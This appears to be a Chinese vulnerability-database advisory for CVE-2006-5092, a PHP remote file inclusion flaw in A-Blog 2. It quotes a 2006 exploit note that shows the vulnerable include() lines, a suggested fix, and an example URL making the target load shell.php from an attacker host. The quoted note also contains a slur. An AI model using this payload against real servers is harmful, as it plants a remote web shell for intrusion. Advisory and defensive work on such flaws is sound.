A-Blog 2 'navigation/menu.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111145 漏洞类型 输入验证
发布时间 2006-09-26 更新时间 2006-10-09
CVE编号 CVE-2006-5092 CNNVD-ID CNNVD-200609-547
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2436
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-547
|漏洞详情
A-Blog2的navigation/menu.php中存在PHP远程文件包含漏洞。远程攻击者可以通过navigation_start参数中的URL执行任意PHP代码。
|漏洞EXP
###### ToXiC #########################
#
#A-Blog Remote File Include
#
#BuG FounD by Drago84
#
#Application Affect:A-Blog
#Source Code:
#http://prdownloads.sourceforge.net/a-blog/A-BlogV2.rar?download
#Problem:
#<?php include ("$navigation_start"); ?>
#<?php include("$navigation_middle"); ?>
#Soluction:
#Include in page require ("mainfile.php");
#Page Vulnerable : menu.php
#Dir : /navigation/
# Exempe Of ExPloit
is:
#http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?

#GrEatZ All Member of ToXiC, Str0ke
# Fuck Sonic,a|x
# ToXic Security Italian CreW

######
ToXiC
###################

# milw0rm.com [2006-09-26]
|参考资料

来源:XF
名称:ablog-menu-file-include(29164)
链接:http://xforce.iss.net/xforce/xfdb/29164
来源:BID
名称:20230
链接:http://www.securityfocus.com/bid/20230
来源:VUPEN
名称:ADV-2006-3796
链接:http://www.frsirt.com/english/advisories/2006/3796
来源:SECUNIA
名称:22061
链接:http://secunia.com/advisories/22061
来源:MILW0RM
名称:2436
链接:http://milw0rm.com/exploits/2436
来源:OSVDB
名称:29217
链接:http://www.osvdb.org/29217